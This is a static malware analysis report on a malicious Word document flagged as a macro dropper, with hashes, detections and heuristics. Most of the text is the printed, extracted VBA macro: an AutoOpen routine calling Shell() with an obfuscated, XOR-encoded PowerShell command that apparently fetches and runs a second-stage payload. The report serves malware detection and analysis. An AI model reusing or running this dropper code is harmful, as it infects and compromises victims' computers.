Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 00af5535fa6566c6…

MALICIOUS

Office (OLE)

Size: 218.2 KB
Created: 2018-06-26 12:55:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: ae3b1d92c6ecbe2a660cc82152ca109f
SHA-1: 5437b874de68cac4342983404c8f09e821d343b7
SHA-256: 00af5535fa6566c62f5350676e02d39077d64078b3ef68bd87f7b1515d26258c
Risk Score: 210

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is a malicious Word document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6592316-0' further supports its malicious nature as a dropper. The macro's obfuscated string concatenation suggests it is designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6592316-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592316-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    sfBuN = CDate(50678)
    NtSrfmiP = YPmJUnHm + bRoBcCUAwH + Shell(lRYrmpV + wzaiPHou + orkQiDJzU, (28857 / 28857) - 1)
    iBbhbB = 22296
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub AutoOpen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  8392 bytes
SHA-256: 974e0f526c6300aca245b18e1739703b3942f79f486641b50457e92a08764a93
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "bGLvNzP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mfiEnVvaTPk"
Function jGdMb()
On Error Resume Next
JDmzs = Sin(92883)
lFKIuh = 24245
ZRmarz = CDate(52493)
KwdwrS = 77688
wZXjj = 26947
fqVofi = IlmUKW
AkMnzU = "Hell" + " ." + Chr(40) + " $Ps" + "HOME[4" + "]" + Chr(43) + "$Ps" + "HoMe[" + "34]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " $"
JrivuC = CDate(56994)
VtliaL = Sin(82219)
svJjEP = XkwwMd
EswwKA = 14775
CSZnb = 88983
YZCOD = 7576
IjPpDrJJR = Chr(40) + "SeT-iT" + "em 'vari" + "aBlE:ofs" + "' " + "''" + Chr(41) + " " + Chr(34) + Chr(43) + " [ST" + "rInG]" + Chr(40) + " " + "'123j" + "49Q10" + "E7_98{4"
MLdvw = Sin(38044)
oXXna = CDate(47504)
qCnDN = uPWiOD
YImCO = 1297
kzoitX = 49332
iDEhl = 86747
rTXOSFR = "9_58{4" + "0I114" + "v4" + "8Q6" + "1v5" + "3j58" + "I60>43>1" + "27E17" + "E58x43I" + "113I8j5"
huKUYJ = 69260
PYLnal = 4215
tmQjw = 88749
OoPMRc = Sin(64373)
jwHiDz = QkoMVh
TQOGHn = CDate(97978)
IYwKsKHu = "8>61j2" + "8>" + "51{54E58" + "{4" + "9j43" + "E1" + "00>123_6" + "2>26j44_"
TinYuv = 92282
CQLfY = 43832
wJPbL = 97151
IzEBs = Sin(95591)
oIPCBz = iqzqW
ECZfqK = CDate(73751)
hwksrClDRws = "98>1" + "20{5" + "5I43E4" + "3!4" + "7>" + "101" + "!112_1" + "12Q4"
MBfHm = 62833
IRQwR = 87228
VstodC = 42332
fHdwi = Sin(46523)
kTaZX = UrIGB
MkbSa = CDate(39427)
RpYiPN = "0x4" + "0>40" + "E113" + "Q43" + "E45E54x" + "49v" + "54" + "Q43I38{5" + "8_50E47" + "!54x4" + "5j5"
NLcBV = 2071
LRZpRQ = 60584
jfJWUN = 61297
GRUPiP = Sin(58298)
cnwvo = inSnqw
AikUiz = CDate(16238)
arqtzwCXS = "8j113_4" + "8x45" + "{56E" + "112v47" + "{41E6!53" + "!5" + "_42x1" + "3Q112" + "_31Q55v" + "43v43!47"
BLEjtd = 50556
jXublP = 36227
SZFpIo = 69181
wqwWM = Sin(58896)
DzHPbT = SmwhAS
OOhoR = CDate(63987)
VmWbDj = "I101j11" + "2!112E4" + "0_40>" + "40!113" + "_62I49j" + "51" + "v6" + "2>4" + "0Q51" + ">51I6" + "0j113j60"
jGdMb = AkMnzU + IjPpDrJJR + rTXOSFR + IYwKsKHu + hwksrClDRws + RpYiPN + arqtzwCXS + VmWbDj
bzSLVv = 94634
PHMIFV = 42597
qBvOnR = 82620
lYEDC = Sin(68955)
GiNKww = uaQsN
IBjMD = CDate(38337)
End Function
Function oZQlHB()
On Error Resume Next
NHEnGU = 53624
XYTjZ = 10575
psnKzG = 64475
soVrCs = Sin(12529)
tREfV = ivwcAN
XjEpN = CDate(6720)
CkOFNKA = "x48x5" + "0{112I1" + "07" + ">27E47" + "!9E" + "112!3" + "1j55_43_" + "43!47"
mmQBrY = 18293
LpsRf = 70386
GnfWY = 94293
tzNCw = Sin(19210)
jTXij = zrOKC
FCTXLw = CDate(2917)
FPaaASwvDC = "v1" + "01E112I1" + "12_5" + "4v59v58" + "!62{51x" + "61"
cCBlpl = 12089
RtmNzQ = 62336
uAHGq = 44824
IELMnM = Sin(57051)
TUtzW = RjGWH
hCMLll = CDate(76114)
WnKJFirYi = "v62E5" + "1v62Q49Q" + "60!58>1" + "13I55E" + "42Q" + "112x1"
LwrOkv = 1815
povlQ = 72700
KUtQHa = 8065
UhWYom = Sin(10707)
WZhDRS = EMQUIb
MbwwA = CDate(90967)
AJEIcVa = "1Q111!" + "48v8>53I" + "112Q" + "31j55" + "{43I4" + "3x47{101" + "_112I1" + "12v40Q40"
fbFiQ = 61429
cMWiU = 4555
nmCGYO = 69197
CORjn = Sin(99300)
JLcsO = MCinDW
KwvXU = CDate(93998)
ZzqkoD = "_4" + "0I113_51" + "Q38E44Q" + "54E5" + "2I" + "48_4" + "1_11" + "3>45_4" + "2{11" + "2_7I61!1" + "03x59E1" + "02j10"
GLAtnv = 73683
tKvdz = 56336
TWWiw = 30597
KAQCZ = Sin(85909)
JPGGSQ = jWOwEz
KaVjta = CDate(50618)
MqDsRCAvS = "8{21>1" + "12" + "x31{55" + "{4" + "3I43v" + "47j101I1" + "12j112" + "!39v6" + "2!53" + ">57"
NNWBfi = 53203
YPzJZo = 46675
hCXHU = 22545
nlMdmF = Sin(26937)
CNNDEF = fVrSL
LouENp = CDate(26719)
wSJAItnb = "_56" + "E37E11" + "3E6" + "0{48v50Q" + "112!" + "61>10" + "2E26" + "E56E8"
aGjXz = 40177
HOSrN = 54093
fpZITM = 23026
QLkQLk = Sin(15472)
Ecbhp = MXaiir
LYYwz = CDate(32755)
mOOLTUt = "!11" + "2v1" + "20_113Q1" + "2!47x51>" + "54j43" + "I1" + "19>" + "12" + "0I31E12" + "0x118"
OkvOMB = 11200
aiziW = 35486
OtSjz = 44399
EZUwab = Sin(4091)
JXAQii = sJqWT
PvBdf = CDate(36297)
nvZzRm = "_100x12" + "3>62j25v" + "51>12" + "7x98v127" + "Q120{11" + "0v103I" + "104>120x" + "100v1" + "23Q" + "48_2" + "7Q"
oZQlHB = CkOFNKA + FPaaASwvDC + WnKJFirYi + AJEIcVa + ZzqkoD + MqDsRCAvS + wSJAItnb + mOOLTUt + nvZzRm
DlztJv = 42989
icfKG = 63392
njVXsf = 23542
mhrzz = Sin(84488)
Rfzdb = cmDhY
pzzzd = CDate(71003)
End Function
Function bZHcj()
On Error Resume Next
Yvfiva = 88356
rUFpfi = 24338
WpYqv = 52258
oTQrAh = Sin(88033)
nitAI = hFUjCO
FwjdI = CDate(86851)
kfJsqwjYR = "6x98j" + "123" + "_5" + "8j49>4" + "1_101j4" + "3v58j5" + "0Q4" + "7x" + "11"
rMwXf = 35876
TaWcVi = 61931
QKOSc = 54848
HZzYz = Sin(15695)
jDjjrw = EilDR
hoTBB = CDate(28267)
hbYdVNJWkC = "6!120x3{" + "120j116" + "I12" + "3!62E25_" + "51Q116_" + "120{11" + "3j58j3" + "9Q58>1" + "20E100" + "_57I48"
WuRaNY = 93688
uArEbc = 6819
DikNEJ = 63049
GTDqI = Sin(83934)
IKtBN = WFJAZ
nfzvL = CDate(21023)
zHVpFjlin = "!45E58_6" + "2I60I" + "55x" + "119" + "v123j40" + "v59j5" + "5_127I5" + "4{49" + "I127{12" + "3x62Q" + "26"
ljjvcT = Sin(72193)
ASvUtN = SooLKz
KAccrP = 31114
owDuMJ = CDate(11781)
OVXoj = 32204
zidLNz = 64875
zWoMAfnjO = "v44v118" + "_36v" + "43" + ">45I3" + "8I36I1" + "23" + "v49x10!" + "7>11" + "3v27_4" + "8>40"
PNDmA = Sin(57896)
SwtDa = FdcUCI
AjUDuw = 61840
fZhVrs = CDate(50395)
DUzIV = 44445
OWXLnp = 25848
zLTTKvhoC = "!49!51E4" + "8x62x59E" + "25>54!" + "51_58" + "x119!123" + "x40E59" + "j55{11" + "5E1" + "27E" + "12" + "3!4" + "8I27j6_1"
KAkrSV = Sin(93875)
rGJStP = vvEZBO
sGzVm = 24317
hkNDdm = CDate(31679)
dSwUil = 55402
RQHAl = 83987
NjLzRMtrKz = "18!100" + "{12!4" + "3x62>4" + "5v43" + "E114I15{" + "45x4" + "8v6"
WiBzUf = Sin(67097)
BUzNo = zKizF
rMCaq = 80782
SIIRj = CDate(49253)
QXoTrB = 62146
EpJvtU = 76060
KjWDXTF = "0x" + "58x4" + "4_44" + "_127Q1" + "23" + ">48" + "E27v6" + "j10"
pDvGZv = Sin(93838)
GDPEd = jWmfUn
EYBLch = 31550
bFqml = CDate(40816)
MWqqpj = 91180
zFQYGm = 55385
tNSUrBZbpj = "0>61" + "_45" + "Q58{6" + "2I52x10" + "0I34" + "!60{62x4" + "3I6"
BccGC = Sin(64486)
vnYuj = Nowkf
PlnHSk = 75497
SBAQi = CDate(27038)
Awqzqk = 50715
bYhWBI = 23408
UqRBAGY = "0j55x36v" + "34Q34'" + ".SpliT" + Chr(40) + " '{Q!v" + "E>_Ijx'" + Chr(41) + " | fOrE" + "AcH" + "-Ob" + "JeCT{" + "[chAr" + "] " + Chr(40) + " $_-B" + "XoR 0x5"
DnsSZj = Sin(1737)
RFJYq = wzZDw
tCGXK = 83150
WThMMB = CDate(40823)
OUAsh = 67426
ImUHZu = 88334
wAMKlfrl = "F " + Chr(41) + "}" + Chr(41) + Chr(43) + Chr(34) + "$" + Chr(40) + " Sv" + " 'Ofs'  " + "' '" + Chr(41) + " " + Chr(34) + Chr(41) + "   "
bZHcj = kfJsqwjYR + hbYdVNJWkC + zHVpFjlin + zWoMAfnjO + zLTTKvhoC + NjLzRMtrKz + KjWDXTF + tNSUrBZbpj + UqRBAGY + wAMKlfrl
dGitL = Sin(80329)
dQSpwE = qHlvJ
zTfFiY = 89353
QLoSC = CDate(82980)
ihWtsD = 48066
kWQHCz = 77549
End Function


Attribute VB_Name = "KCbwpvbSk"
Function btSjzrCpl()
On Error Resume Next
kwSvB = 21840
VbbUAl = Sin(81035)
NusDI = 11314
hfoLDd = dIJIEF
KaNCXN = 64690
wIwWho = CDate(99856)
jKXLSCMF = FDNqDkT + Chr(fqnwzvQ + 80 + XCGSJzQm) + "ow" + "ers"
rAUkQj = 31112
Haraq = Sin(54883)
mfkDTi = 2444
sKYvqs = cZjnh
jFDUsP = 89040
MurFAU = CDate(92647)
BJuGv = 4293
RPdqk = Sin(47440)
ASACZj = 67830
OGJAKE = aMrLS
wHrGP = 83415
cTjbfI = CDate(69495)
btSjzrCpl = KSbotIYZ + jKXLSCMF + jGdMb + oZQlHB + bZHcj
nKfkj = 79029
RlzRNP = Sin(12590)
sIIip = 9207
JwKpK = EMDFI
sLjBat = 18413
hjuOa = CDate(44635)
End Function
Function fdNDOwjX(wzaiPHou)
On Error Resume Next
CVjij = 93619
hJNLzf = Sin(15133)
dVWXr = 10401
Ghkfk = wRZFU
naFovV = 73587
PjhiiH = CDate(30603)
INrDzm = 28847
lzNBIb = Sin(73801)
ptljf = 46675
bCFAGl = FwoqR
LuXIj = 91683
sfBuN = CDate(50678)
NtSrfmiP = YPmJUnHm + bRoBcCUAwH + Shell(lRYrmpV + wzaiPHou + orkQiDJzU, (28857 / 28857) - 1)
iBbhbB = 22296
iUwOU = Sin(19477)
prqIuu = 43284
DjiYNK = CUWLU
apIfZk = 58606
aDYwr = CDate(55063)
End Function
Sub AutoOpen()
On Error Resume Next
BlnAzd = 47448
omJZCz = Sin(73105)
XCFnPC = 65256
VKsAYi = rlJpv
BOGiQX = 65735
TljSM = CDate(74022)
Application.Run "fdNDOwjX", btSjzrCpl
PQOwmT = 11382
kdjni = Sin(49356)
BhrWnz = 16769
izzUYE = aEiOzX
VnCcjK = 59609
fNRUK = CDate(58216)
End Sub